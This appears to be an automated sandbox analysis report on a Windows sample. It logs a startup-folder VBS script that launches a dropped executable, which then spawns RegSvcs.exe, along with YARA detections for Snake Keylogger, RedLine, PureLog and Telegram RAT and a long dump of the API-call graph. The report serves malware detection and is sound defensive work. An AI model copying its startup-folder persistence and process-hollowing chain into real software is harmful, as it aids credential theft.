• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 4
Start time: 17:44:19
Start date: 10/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
Imagebase: 0x7ff6a3860000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 17:44:20
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Okeghem\ghauts.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
Imagebase: 0x590000
File size: 1'147'904 bytes
MD5 hash: 1D0C53E42BD84B7B7CFABED7DAE7F570
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 8
Start time: 17:44:24
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
Imagebase: 0xbd0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:0.5%
Signature Coverage:7.4%
Total number of Nodes:2000
Total number of Limit Nodes:174

[Execution graph rendering omitted: the original page lists the graph as a flat dump of ~2000 numbered nodes and address-to-address edges (e.g. 103482->103487) annotated with the CRT and Win32 calls reached, including RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, RtlAllocateHeap, IsDebuggerPresent, MessageBoxA, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, Shell_NotifyIconW, CreateWindowExW, PeekMessageW, TranslateMessage, DispatchMessageW, ShellExecuteW, WaitForSingleObject, GetExitCodeProcess, Sleep, timeGetTime, QueryPerformanceCounter, LoadLibraryA, LoadLibraryExW, GetProcAddress, CreateStreamOnHGlobal, VariantClear, SetUnhandledExceptionFilter and TerminateProcess.]
f17da7 104536 f08b28 58 API calls __getptd_noexit 104452->104536 104454->104452 104456 f17ddd 104454->104456 104455 f17dac 104537 f08db6 9 API calls __gmtime64_s 104455->104537 104462 f17e4e 104456->104462 104459 f17df9 104538 f17e22 LeaveCriticalSection __unlock_fhandle 104459->104538 104461 f17db6 type_info::_Type_info_dtor 104461->104445 104463 f17e6e 104462->104463 104464 f044ea __wsopen_nolock 58 API calls 104463->104464 104468 f17e8a 104464->104468 104465 f17fc1 104466 f08dc6 __invoke_watson 8 API calls 104465->104466 104467 f185a0 104466->104467 104469 f17d85 __wsopen_helper 103 API calls 104467->104469 104468->104465 104470 f17ec4 104468->104470 104481 f17ee7 104468->104481 104471 f185ba 104469->104471 104472 f08af4 __dosmaperr 58 API calls 104470->104472 104471->104459 104473 f17ec9 104472->104473 104474 f08b28 __gmtime64_s 58 API calls 104473->104474 104475 f17ed6 104474->104475 104476 f08db6 __gmtime64_s 9 API calls 104475->104476 104478 f17ee0 104476->104478 104477 f17fa5 104479 f08af4 __dosmaperr 58 API calls 104477->104479 104478->104459 104480 f17faa 104479->104480 104482 f08b28 __gmtime64_s 58 API calls 104480->104482 104481->104477 104485 f17f83 104481->104485 104483 f17fb7 104482->104483 104484 f08db6 __gmtime64_s 9 API calls 104483->104484 104484->104465 104486 f0d294 __alloc_osfhnd 61 API calls 104485->104486 104487 f18051 104486->104487 104488 f1805b 104487->104488 104489 f1807e 104487->104489 104491 f08af4 __dosmaperr 58 API calls 104488->104491 104490 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104489->104490 104501 f180a0 104490->104501 104492 f18060 104491->104492 104494 f08b28 __gmtime64_s 58 API calls 104492->104494 104493 f1811e GetFileType 104495 f18129 GetLastError 104493->104495 104496 f1816b 104493->104496 104498 f1806a 104494->104498 104500 f08b07 __dosmaperr 58 API calls 104495->104500 104508 f0d52a __set_osfhnd 59 API calls 104496->104508 104497 f180ec GetLastError 104502 f08b07 __dosmaperr 58 API calls 
104497->104502 104499 f08b28 __gmtime64_s 58 API calls 104498->104499 104499->104478 104503 f18150 CloseHandle 104500->104503 104501->104493 104501->104497 104504 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104501->104504 104505 f18111 104502->104505 104503->104505 104506 f1815e 104503->104506 104507 f180e1 104504->104507 104510 f08b28 __gmtime64_s 58 API calls 104505->104510 104509 f08b28 __gmtime64_s 58 API calls 104506->104509 104507->104493 104507->104497 104513 f18189 104508->104513 104511 f18163 104509->104511 104510->104465 104511->104505 104512 f18344 104512->104465 104515 f18517 CloseHandle 104512->104515 104513->104512 104514 f118c1 __lseeki64_nolock 60 API calls 104513->104514 104533 f1820a 104513->104533 104516 f181f3 104514->104516 104517 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104515->104517 104519 f08af4 __dosmaperr 58 API calls 104516->104519 104516->104533 104518 f1853e 104517->104518 104521 f18546 GetLastError 104518->104521 104522 f18572 104518->104522 104519->104533 104520 f10e5b 70 API calls __read_nolock 104520->104533 104523 f08b07 __dosmaperr 58 API calls 104521->104523 104522->104465 104525 f18552 104523->104525 104524 f118c1 60 API calls __lseeki64_nolock 104524->104533 104529 f0d43d __free_osfhnd 59 API calls 104525->104529 104526 f10add __close_nolock 61 API calls 104526->104533 104527 f1823c 104528 f197a2 __chsize_nolock 82 API calls 104527->104528 104527->104533 104528->104527 104529->104522 104530 f0d886 __write 78 API calls 104530->104533 104531 f183c1 104532 f10add __close_nolock 61 API calls 104531->104532 104534 f183c8 104532->104534 104533->104512 104533->104520 104533->104524 104533->104526 104533->104527 104533->104530 104533->104531 104535 f08b28 __gmtime64_s 58 API calls 104534->104535 104535->104465 104536->104455 104537->104461 104538->104461 104540 ee4b83 104539->104540 104541 ee4c3f LoadLibraryA 104539->104541 104540->104341 104540->104342 104541->104540 104542 ee4c50 
GetProcAddress 104541->104542 104542->104540 104544 ee4ea3 FindResourceExW 104543->104544 104548 ee4ec0 104543->104548 104545 f1d933 LoadResource 104544->104545 104544->104548 104546 f1d948 SizeofResource 104545->104546 104545->104548 104547 f1d95c LockResource 104546->104547 104546->104548 104547->104548 104548->104350 104550 ee4ef4 104549->104550 104553 f1d9ab 104549->104553 104555 f0584d 104550->104555 104552 ee4f02 104552->104361 104554->104350 104556 f05859 type_info::_Type_info_dtor 104555->104556 104557 f0586b 104556->104557 104559 f05891 104556->104559 104568 f08b28 58 API calls __getptd_noexit 104557->104568 104570 f06c11 104559->104570 104560 f05870 104569 f08db6 9 API calls __gmtime64_s 104560->104569 104563 f05897 104576 f057be 83 API calls 5 library calls 104563->104576 104565 f058a6 104577 f058c8 LeaveCriticalSection LeaveCriticalSection _fprintf 104565->104577 104567 f0587b type_info::_Type_info_dtor 104567->104552 104568->104560 104569->104567 104571 f06c21 104570->104571 104572 f06c43 EnterCriticalSection 104570->104572 104571->104572 104573 f06c29 104571->104573 104574 f06c39 104572->104574 104575 f09c0b __lock 58 API calls 104573->104575 104574->104563 104575->104574 104576->104565 104577->104567 104581 f055fd 104578->104581 104580 ee4f2e 104580->104369 104582 f05609 type_info::_Type_info_dtor 104581->104582 104583 f0564c 104582->104583 104585 f05644 type_info::_Type_info_dtor 104582->104585 104587 f0561f _memset 104582->104587 104584 f06c11 __lock_file 59 API calls 104583->104584 104586 f05652 104584->104586 104585->104580 104594 f0541d 104586->104594 104608 f08b28 58 API calls __getptd_noexit 104587->104608 104590 f05639 104609 f08db6 9 API calls __gmtime64_s 104590->104609 104598 f05438 _memset 104594->104598 104600 f05453 104594->104600 104595 f05443 104706 f08b28 58 API calls __getptd_noexit 104595->104706 104597 f05448 104707 f08db6 9 API calls __gmtime64_s 104597->104707 104598->104595 104598->104600 104603 f05493 104598->104603 104610 
f05686 LeaveCriticalSection LeaveCriticalSection _fprintf 104600->104610 104602 f055a4 _memset 104709 f08b28 58 API calls __getptd_noexit 104602->104709 104603->104600 104603->104602 104611 f046e6 104603->104611 104618 f10e5b 104603->104618 104686 f10ba7 104603->104686 104708 f10cc8 58 API calls 3 library calls 104603->104708 104608->104590 104609->104585 104610->104585 104612 f046f0 104611->104612 104613 f04705 104611->104613 104710 f08b28 58 API calls __getptd_noexit 104612->104710 104613->104603 104615 f046f5 104711 f08db6 9 API calls __gmtime64_s 104615->104711 104617 f04700 104617->104603 104619 f10e93 104618->104619 104620 f10e7c 104618->104620 104622 f115cb 104619->104622 104627 f10ecd 104619->104627 104721 f08af4 58 API calls __getptd_noexit 104620->104721 104737 f08af4 58 API calls __getptd_noexit 104622->104737 104624 f10e81 104722 f08b28 58 API calls __getptd_noexit 104624->104722 104625 f115d0 104738 f08b28 58 API calls __getptd_noexit 104625->104738 104628 f10ed5 104627->104628 104635 f10eec 104627->104635 104723 f08af4 58 API calls __getptd_noexit 104628->104723 104631 f10ee1 104739 f08db6 9 API calls __gmtime64_s 104631->104739 104632 f10eda 104724 f08b28 58 API calls __getptd_noexit 104632->104724 104634 f10f01 104725 f08af4 58 API calls __getptd_noexit 104634->104725 104635->104634 104638 f10f1b 104635->104638 104639 f10f39 104635->104639 104666 f10e88 104635->104666 104638->104634 104641 f10f26 104638->104641 104726 f0881d 58 API calls 2 library calls 104639->104726 104712 f15c6b 104641->104712 104642 f10f49 104644 f10f51 104642->104644 104645 f10f6c 104642->104645 104727 f08b28 58 API calls __getptd_noexit 104644->104727 104729 f118c1 60 API calls 3 library calls 104645->104729 104646 f1103a 104648 f110b3 ReadFile 104646->104648 104653 f11050 GetConsoleMode 104646->104653 104651 f11593 GetLastError 104648->104651 104652 f110d5 104648->104652 104650 f10f56 104728 f08af4 58 API calls __getptd_noexit 104650->104728 104655 f115a0 104651->104655 
104656 f11093 104651->104656 104652->104651 104660 f110a5 104652->104660 104657 f110b0 104653->104657 104658 f11064 104653->104658 104735 f08b28 58 API calls __getptd_noexit 104655->104735 104668 f11099 104656->104668 104730 f08b07 58 API calls 2 library calls 104656->104730 104657->104648 104658->104657 104661 f1106a ReadConsoleW 104658->104661 104660->104668 104669 f1110a 104660->104669 104670 f11377 104660->104670 104661->104660 104662 f1108d GetLastError 104661->104662 104662->104656 104664 f115a5 104736 f08af4 58 API calls __getptd_noexit 104664->104736 104666->104603 104667 f02d55 _free 58 API calls 104667->104666 104668->104666 104668->104667 104672 f11176 ReadFile 104669->104672 104678 f111f7 104669->104678 104670->104668 104676 f1147d ReadFile 104670->104676 104673 f11197 GetLastError 104672->104673 104682 f111a1 104672->104682 104673->104682 104674 f112b4 104680 f11264 MultiByteToWideChar 104674->104680 104733 f118c1 60 API calls 3 library calls 104674->104733 104675 f112a4 104732 f08b28 58 API calls __getptd_noexit 104675->104732 104677 f114a0 GetLastError 104676->104677 104685 f114ae 104676->104685 104677->104685 104678->104668 104678->104674 104678->104675 104678->104680 104680->104662 104680->104668 104682->104669 104731 f118c1 60 API calls 3 library calls 104682->104731 104685->104670 104734 f118c1 60 API calls 3 library calls 104685->104734 104687 f10bb2 104686->104687 104691 f10bc7 104686->104691 104773 f08b28 58 API calls __getptd_noexit 104687->104773 104689 f10bb7 104774 f08db6 9 API calls __gmtime64_s 104689->104774 104692 f10bfc 104691->104692 104698 f10bc2 104691->104698 104775 f15fe4 58 API calls __malloc_crt 104691->104775 104694 f046e6 __flsbuf 58 API calls 104692->104694 104695 f10c10 104694->104695 104740 f10d47 104695->104740 104697 f10c17 104697->104698 104699 f046e6 __flsbuf 58 API calls 104697->104699 104698->104603 104700 f10c3a 104699->104700 104700->104698 104701 f046e6 __flsbuf 58 API calls 104700->104701 104702 f10c46 
104701->104702 104702->104698 104703 f046e6 __flsbuf 58 API calls 104702->104703 104704 f10c53 104703->104704 104705 f046e6 __flsbuf 58 API calls 104704->104705 104705->104698 104706->104597 104707->104600 104708->104603 104709->104597 104710->104615 104711->104617 104713 f15c76 104712->104713 104715 f15c83 104712->104715 104714 f08b28 __gmtime64_s 58 API calls 104713->104714 104716 f15c7b 104714->104716 104717 f15c8f 104715->104717 104718 f08b28 __gmtime64_s 58 API calls 104715->104718 104716->104646 104717->104646 104719 f15cb0 104718->104719 104720 f08db6 __gmtime64_s 9 API calls 104719->104720 104720->104716 104721->104624 104722->104666 104723->104632 104724->104631 104725->104632 104726->104642 104727->104650 104728->104666 104729->104641 104730->104668 104731->104682 104732->104668 104733->104680 104734->104685 104735->104664 104736->104668 104737->104625 104738->104631 104739->104666 104741 f10d53 type_info::_Type_info_dtor 104740->104741 104742 f10d60 104741->104742 104743 f10d77 104741->104743 104744 f08af4 __dosmaperr 58 API calls 104742->104744 104745 f10e3b 104743->104745 104746 f10d8b 104743->104746 104748 f10d65 104744->104748 104747 f08af4 __dosmaperr 58 API calls 104745->104747 104749 f10db6 104746->104749 104750 f10da9 104746->104750 104751 f10dae 104747->104751 104752 f08b28 __gmtime64_s 58 API calls 104748->104752 104754 f10dc3 104749->104754 104755 f10dd8 104749->104755 104753 f08af4 __dosmaperr 58 API calls 104750->104753 104758 f08b28 __gmtime64_s 58 API calls 104751->104758 104762 f10d6c type_info::_Type_info_dtor 104752->104762 104753->104751 104756 f08af4 __dosmaperr 58 API calls 104754->104756 104757 f0d206 ___lock_fhandle 59 API calls 104755->104757 104759 f10dc8 104756->104759 104760 f10dde 104757->104760 104761 f10dd0 104758->104761 104763 f08b28 __gmtime64_s 58 API calls 104759->104763 104764 f10df1 104760->104764 104765 f10e04 104760->104765 104768 f08db6 __gmtime64_s 9 API calls 104761->104768 104762->104697 104763->104761 104767 
f10e5b __read_nolock 70 API calls 104764->104767 104766 f08b28 __gmtime64_s 58 API calls 104765->104766 104769 f10e09 104766->104769 104770 f10dfd 104767->104770 104768->104762 104771 f08af4 __dosmaperr 58 API calls 104769->104771 104772 f10e33 __read LeaveCriticalSection 104770->104772 104771->104770 104772->104762 104773->104689 104774->104698 104775->104692 104779 f0520a GetSystemTimeAsFileTime 104776->104779 104778 f48f6e 104778->104371 104780 f05238 __aulldiv 104779->104780 104780->104778 104782 f05c6c type_info::_Type_info_dtor 104781->104782 104783 f05c93 104782->104783 104784 f05c7e 104782->104784 104786 f06c11 __lock_file 59 API calls 104783->104786 104795 f08b28 58 API calls __getptd_noexit 104784->104795 104788 f05c99 104786->104788 104787 f05c83 104796 f08db6 9 API calls __gmtime64_s 104787->104796 104797 f058d0 67 API calls 6 library calls 104788->104797 104791 f05ca4 104798 f05cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 104791->104798 104793 f05cb6 104794 f05c8e type_info::_Type_info_dtor 104793->104794 104794->104375 104795->104787 104796->104794 104797->104791 104798->104793 104799->104238 104800->104247 104801->104261 104802->104263 104803->104259 104804->104268 104806 ee9169 Mailbox 104805->104806 104807 f1f19f 104806->104807 104812 ee9173 104806->104812 104808 f00db6 Mailbox 59 API calls 104807->104808 104810 f1f1ab 104808->104810 104809 ee917a 104809->104274 104812->104809 104813 ee9c90 104812->104813 104815 ee9c9b 104813->104815 104814 ee9cd2 104814->104812 104815->104814 104818 ee8cd4 59 API calls Mailbox 104815->104818 104817 ee9cfd 104817->104812 104818->104817 104820 ee9d4a 104819->104820 104830 ee9d78 Mailbox 104819->104830 104821 ee9d9d 104820->104821 104824 ee9d50 Mailbox 104820->104824 104822 ee8047 59 API calls 104821->104822 104822->104830 104823 ee9d64 104825 ee9d6f 104823->104825 104826 ee9dcc 104823->104826 104823->104830 104824->104823 104829 f1fa0f 104824->104829 104827 f1f9e6 VariantClear 104825->104827 104825->104830 
104826->104830 104833 ee8cd4 59 API calls Mailbox 104826->104833 104827->104830 104829->104830 104834 f36e8f 59 API calls 104829->104834 104830->104283 104832->104280 104833->104830 104834->104830 104836 f49748 __tzset_nolock _wcscmp 104835->104836 104837 ee4f0b 74 API calls 104836->104837 104838 f495dc 104836->104838 104839 f49109 GetSystemTimeAsFileTime 104836->104839 104840 ee4ee5 85 API calls 104836->104840 104837->104836 104838->104289 104838->104316 104839->104836 104840->104836 104842 f48b1f 104841->104842 104843 f48b11 104841->104843 104845 f48b64 104842->104845 104846 f0525b 115 API calls 104842->104846 104871 f48b28 104842->104871 104844 f0525b 115 API calls 104843->104844 104844->104842 104872 f48d91 104845->104872 104847 f48b49 104846->104847 104847->104845 104850 f48b52 104847->104850 104849 f48ba8 104851 f48bac 104849->104851 104852 f48bcd 104849->104852 104853 f053a6 __fcloseall 83 API calls 104850->104853 104850->104871 104855 f48bb9 104851->104855 104856 f053a6 __fcloseall 83 API calls 104851->104856 104876 f489a9 104852->104876 104853->104871 104858 f053a6 __fcloseall 83 API calls 104855->104858 104855->104871 104856->104855 104858->104871 104859 f48bfb 104885 f48c2b 104859->104885 104860 f48bdb 104862 f48be8 104860->104862 104864 f053a6 __fcloseall 83 API calls 104860->104864 104865 f053a6 __fcloseall 83 API calls 104862->104865 104862->104871 104864->104862 104865->104871 104868 f48c16 104870 f053a6 __fcloseall 83 API calls 104868->104870 104868->104871 104870->104871 104871->104318 104873 f48db6 104872->104873 104875 f48d9f __tzset_nolock _memmove 104872->104875 104874 f055e2 __fread_nolock 74 API calls 104873->104874 104874->104875 104875->104849 104877 f0571c std::exception::_Copy_str 58 API calls 104876->104877 104878 f489b8 104877->104878 104879 f0571c std::exception::_Copy_str 58 API calls 104878->104879 104880 f489cc 104879->104880 104881 f0571c std::exception::_Copy_str 58 API calls 104880->104881 104882 f489e0 104881->104882 104883 
f48d0d 58 API calls 104882->104883 104884 f489f3 104882->104884 104883->104884 104884->104859 104884->104860 104886 f48c40 104885->104886 104887 f48cf8 104886->104887 104889 f48a05 74 API calls 104886->104889 104892 f48c02 104886->104892 104914 f48e12 104886->104914 104922 f48aa1 74 API calls 104886->104922 104918 f48f35 104887->104918 104889->104886 104893 f48d0d 104892->104893 104894 f48d20 104893->104894 104895 f48d1a 104893->104895 104897 f02d55 _free 58 API calls 104894->104897 104899 f48d31 104894->104899 104896 f02d55 _free 58 API calls 104895->104896 104896->104894 104897->104899 104898 f02d55 _free 58 API calls 104900 f48c09 104898->104900 104899->104898 104899->104900 104900->104868 104901 f053a6 104900->104901 104902 f053b2 type_info::_Type_info_dtor 104901->104902 104903 f053c6 104902->104903 104905 f053de 104902->104905 104971 f08b28 58 API calls __getptd_noexit 104903->104971 104907 f06c11 __lock_file 59 API calls 104905->104907 104910 f053d6 type_info::_Type_info_dtor 104905->104910 104906 f053cb 104972 f08db6 9 API calls __gmtime64_s 104906->104972 104909 f053f0 104907->104909 104955 f0533a 104909->104955 104910->104868 104915 f48e61 104914->104915 104916 f48e21 104914->104916 104915->104916 104923 f48ee8 104915->104923 104916->104886 104919 f48f42 104918->104919 104920 f48f53 104918->104920 104921 f04863 80 API calls 104919->104921 104920->104892 104921->104920 104922->104886 104924 f48f14 104923->104924 104925 f48f25 104923->104925 104927 f04863 104924->104927 104925->104915 104928 f0486f type_info::_Type_info_dtor 104927->104928 104929 f048a5 104928->104929 104930 f0488d 104928->104930 104932 f0489d type_info::_Type_info_dtor 104928->104932 104933 f06c11 __lock_file 59 API calls 104929->104933 104952 f08b28 58 API calls __getptd_noexit 104930->104952 104932->104925 104935 f048ab 104933->104935 104934 f04892 104953 f08db6 9 API calls __gmtime64_s 104934->104953 104940 f0470a 104935->104940 104943 f04719 104940->104943 104947 f04737 104940->104947 
104941 f04727 104942 f08b28 __gmtime64_s 58 API calls 104941->104942 104944 f0472c 104942->104944 104943->104941 104946 f04751 _memmove 104943->104946 104943->104947 104945 f08db6 __gmtime64_s 9 API calls 104944->104945 104945->104947 104946->104947 104948 f0ae1e __flsbuf 78 API calls 104946->104948 104949 f04a3d __flush 78 API calls 104946->104949 104950 f046e6 __flsbuf 58 API calls 104946->104950 104951 f0d886 __write 78 API calls 104946->104951 104954 f048dd LeaveCriticalSection LeaveCriticalSection _fprintf 104947->104954 104948->104946 104949->104946 104950->104946 104951->104946 104952->104934 104953->104932 104954->104932 104956 f05349 104955->104956 104957 f0535d 104955->104957 105010 f08b28 58 API calls __getptd_noexit 104956->105010 104963 f05359 104957->104963 104974 f04a3d 104957->104974 104959 f0534e 105011 f08db6 9 API calls __gmtime64_s 104959->105011 104973 f05415 LeaveCriticalSection LeaveCriticalSection _fprintf 104963->104973 104966 f046e6 __flsbuf 58 API calls 104967 f05377 104966->104967 104984 f10a02 104967->104984 104969 f0537d 104969->104963 104970 f02d55 _free 58 API calls 104969->104970 104970->104963 104971->104906 104972->104910 104973->104910 104975 f04a50 104974->104975 104979 f04a74 104974->104979 104976 f046e6 __flsbuf 58 API calls 104975->104976 104975->104979 104977 f04a6d 104976->104977 105012 f0d886 104977->105012 104980 f10b77 104979->104980 104981 f05371 104980->104981 104982 f10b84 104980->104982 104981->104966 104982->104981 104983 f02d55 _free 58 API calls 104982->104983 104983->104981 104985 f10a0e type_info::_Type_info_dtor 104984->104985 104986 f10a1b 104985->104986 104987 f10a32 104985->104987 105137 f08af4 58 API calls __getptd_noexit 104986->105137 104988 f10abd 104987->104988 104991 f10a42 104987->104991 105142 f08af4 58 API calls __getptd_noexit 104988->105142 104990 f10a20 105138 f08b28 58 API calls __getptd_noexit 104990->105138 104994 f10a60 104991->104994 104995 f10a6a 104991->104995 105139 f08af4 58 API calls 
__getptd_noexit 104994->105139 104998 f0d206 ___lock_fhandle 59 API calls 104995->104998 104996 f10a65 105143 f08b28 58 API calls __getptd_noexit 104996->105143 105000 f10a70 104998->105000 105002 f10a83 105000->105002 105003 f10a8e 105000->105003 105001 f10ac9 105144 f08db6 9 API calls __gmtime64_s 105001->105144 105122 f10add 105002->105122 105140 f08b28 58 API calls __getptd_noexit 105003->105140 105007 f10a27 type_info::_Type_info_dtor 105007->104969 105008 f10a89 105141 f10ab5 LeaveCriticalSection __unlock_fhandle 105008->105141 105010->104959 105011->104963 105013 f0d892 type_info::_Type_info_dtor 105012->105013 105014 f0d8b6 105013->105014 105015 f0d89f 105013->105015 105016 f0d955 105014->105016 105018 f0d8ca 105014->105018 105113 f08af4 58 API calls __getptd_noexit 105015->105113 105119 f08af4 58 API calls __getptd_noexit 105016->105119 105021 f0d8f2 105018->105021 105022 f0d8e8 105018->105022 105020 f0d8a4 105114 f08b28 58 API calls __getptd_noexit 105020->105114 105040 f0d206 105021->105040 105115 f08af4 58 API calls __getptd_noexit 105022->105115 105023 f0d8ed 105120 f08b28 58 API calls __getptd_noexit 105023->105120 105027 f0d8f8 105029 f0d90b 105027->105029 105030 f0d91e 105027->105030 105049 f0d975 105029->105049 105116 f08b28 58 API calls __getptd_noexit 105030->105116 105031 f0d961 105121 f08db6 9 API calls __gmtime64_s 105031->105121 105035 f0d917 105118 f0d94d LeaveCriticalSection __unlock_fhandle 105035->105118 105036 f0d923 105117 f08af4 58 API calls __getptd_noexit 105036->105117 105037 f0d8ab type_info::_Type_info_dtor 105037->104979 105041 f0d212 type_info::_Type_info_dtor 105040->105041 105042 f0d261 EnterCriticalSection 105041->105042 105043 f09c0b __lock 58 API calls 105041->105043 105044 f0d287 type_info::_Type_info_dtor 105042->105044 105045 f0d237 105043->105045 105044->105027 105046 f0d24f 105045->105046 105047 f09e2b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 105045->105047 105048 f0d28b ___lock_fhandle LeaveCriticalSection 
105046->105048 105047->105046 105048->105042 105050 f0d982 __write_nolock 105049->105050 105051 f0d9b6 105050->105051 105052 f0d9e0 105050->105052 105053 f0d9c1 105050->105053 105054 f0c5f6 _$I10_OUTPUT 6 API calls 105051->105054 105056 f0da38 105052->105056 105057 f0da1c 105052->105057 105055 f08af4 __dosmaperr 58 API calls 105053->105055 105058 f0e1d6 105054->105058 105059 f0d9c6 105055->105059 105061 f0da51 105056->105061 105065 f118c1 __lseeki64_nolock 60 API calls 105056->105065 105060 f08af4 __dosmaperr 58 API calls 105057->105060 105058->105035 105062 f08b28 __gmtime64_s 58 API calls 105059->105062 105064 f0da21 105060->105064 105063 f15c6b __flsbuf 58 API calls 105061->105063 105066 f0d9cd 105062->105066 105067 f0da5f 105063->105067 105068 f08b28 __gmtime64_s 58 API calls 105064->105068 105065->105061 105069 f08db6 __gmtime64_s 9 API calls 105066->105069 105070 f0ddb8 105067->105070 105075 f099ac __beginthreadex 58 API calls 105067->105075 105071 f0da28 105068->105071 105069->105051 105072 f0ddd6 105070->105072 105073 f0e14b WriteFile 105070->105073 105074 f08db6 __gmtime64_s 9 API calls 105071->105074 105076 f0defa 105072->105076 105084 f0ddec 105072->105084 105077 f0ddab GetLastError 105073->105077 105082 f0dd78 105073->105082 105074->105051 105078 f0da8b GetConsoleMode 105075->105078 105088 f0dfef 105076->105088 105090 f0df05 105076->105090 105077->105082 105078->105070 105080 f0daca 105078->105080 105079 f0e184 105079->105051 105081 f08b28 __gmtime64_s 58 API calls 105079->105081 105080->105070 105083 f0dada GetConsoleCP 105080->105083 105086 f0e1b2 105081->105086 105082->105051 105082->105079 105087 f0ded8 105082->105087 105083->105079 105109 f0db09 105083->105109 105084->105079 105085 f0de5b WriteFile 105084->105085 105085->105077 105089 f0de98 105085->105089 105091 f08af4 __dosmaperr 58 API calls 105086->105091 105092 f0dee3 105087->105092 105093 f0e17b 105087->105093 105088->105079 105094 f0e064 WideCharToMultiByte 105088->105094 105089->105084 
105095 f0debc 105089->105095 105090->105079 105096 f0df6a WriteFile 105090->105096 105091->105051 105098 f08b28 __gmtime64_s 58 API calls 105092->105098 105099 f08b07 __dosmaperr 58 API calls 105093->105099 105094->105077 105105 f0e0ab 105094->105105 105095->105082 105096->105077 105097 f0dfb9 105096->105097 105097->105082 105097->105090 105097->105095 105100 f0dee8 105098->105100 105099->105051 105103 f08af4 __dosmaperr 58 API calls 105100->105103 105101 f0e0b3 WriteFile 105102 f0e106 GetLastError 105101->105102 105101->105105 105102->105105 105103->105051 105104 f035f5 __write_nolock 58 API calls 105104->105109 105105->105082 105105->105088 105105->105095 105105->105101 105106 f162ba 60 API calls __write_nolock 105106->105109 105107 f0dbf2 WideCharToMultiByte 105107->105082 105108 f0dc2d WriteFile 105107->105108 105108->105077 105111 f0dc5f 105108->105111 105109->105082 105109->105104 105109->105106 105109->105107 105109->105111 105110 f17a5e WriteConsoleW CreateFileW __putwch_nolock 105110->105111 105111->105077 105111->105082 105111->105109 105111->105110 105112 f0dc87 WriteFile 105111->105112 105112->105077 105112->105111 105113->105020 105114->105037 105115->105023 105116->105036 105117->105035 105118->105037 105119->105023 105120->105031 105121->105037 105145 f0d4c3 105122->105145 105124 f10b41 105158 f0d43d 59 API calls 2 library calls 105124->105158 105126 f10aeb 105126->105124 105129 f0d4c3 __close_nolock 58 API calls 105126->105129 105136 f10b1f 105126->105136 105127 f0d4c3 __close_nolock 58 API calls 105130 f10b2b CloseHandle 105127->105130 105128 f10b49 105131 f10b6b 105128->105131 105159 f08b07 58 API calls 2 library calls 105128->105159 105132 f10b16 105129->105132 105130->105124 105133 f10b37 GetLastError 105130->105133 105131->105008 105135 f0d4c3 __close_nolock 58 API calls 105132->105135 105133->105124 105135->105136 105136->105124 105136->105127 105137->104990 105138->105007 105139->104996 105140->105008 105141->105007 105142->104996 
